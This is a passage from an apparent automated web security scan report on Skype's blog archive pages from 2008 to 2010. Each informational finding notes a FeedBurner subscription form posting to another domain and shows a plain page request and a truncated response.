Date: Sun, 04 Sep 2011 21:42:13 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 137689
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.38. http://blogs.skype.com/en/2008/01/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2008/01/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2008/01/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:12 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 125026
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.39. http://blogs.skype.com/en/2008/02/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2008/02/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2008/02/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:11 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 106907
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.40. http://blogs.skype.com/en/2008/03/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2008/03/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2008/03/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:10 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 126075
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.41. http://blogs.skype.com/en/2008/04/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2008/04/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2008/04/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:09 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 216000
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.42. http://blogs.skype.com/en/2008/05/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2008/05/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2008/05/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:07 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 87142
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.43. http://blogs.skype.com/en/2008/06/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2008/06/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2008/06/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:06 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 351318
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.44. http://blogs.skype.com/en/2008/07/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2008/07/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2008/07/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:05 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 138815
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.45. http://blogs.skype.com/en/2008/08/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2008/08/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2008/08/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:04 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 364699
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.46. http://blogs.skype.com/en/2008/09/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2008/09/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2008/09/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:02 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 132877
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.47. http://blogs.skype.com/en/2008/10/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2008/10/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2008/10/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:01 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 248998
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.48. http://blogs.skype.com/en/2008/11/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2008/11/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2008/11/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:00 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 135760
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.49. http://blogs.skype.com/en/2008/12/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2008/12/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2008/12/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:59 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 161922
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.50. http://blogs.skype.com/en/2009/01/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2009/01/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2009/01/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:57 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 105287
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.51. http://blogs.skype.com/en/2009/02/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2009/02/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2009/02/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:57 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 308499
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.52. http://blogs.skype.com/en/2009/03/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2009/03/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2009/03/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:55 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 527797
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.53. http://blogs.skype.com/en/2009/04/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2009/04/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2009/04/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:53 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 87373
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.54. http://blogs.skype.com/en/2009/05/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2009/05/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2009/05/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:52 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 111632
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.55. http://blogs.skype.com/en/2009/06/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2009/06/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2009/06/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:51 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 203279
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.56. http://blogs.skype.com/en/2009/07/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2009/07/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2009/07/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:50 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 125776
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.57. http://blogs.skype.com/en/2009/08/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2009/08/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2009/08/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:49 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 204408
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.58. http://blogs.skype.com/en/2009/09/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2009/09/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2009/09/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:47 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 163021
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.59. http://blogs.skype.com/en/2009/10/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2009/10/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2009/10/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:46 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 100515
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.60. http://blogs.skype.com/en/2009/11/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2009/11/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2009/11/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:45 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 183138
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.61. http://blogs.skype.com/en/2009/12/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2009/12/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2009/12/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:44 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 183916
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.62. http://blogs.skype.com/en/2010/01/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2010/01/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2010/01/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:43 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 182044
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.63. http://blogs.skype.com/en/2010/02/  previous  next

Summary

Severity:   Information
Confidence:   Certain
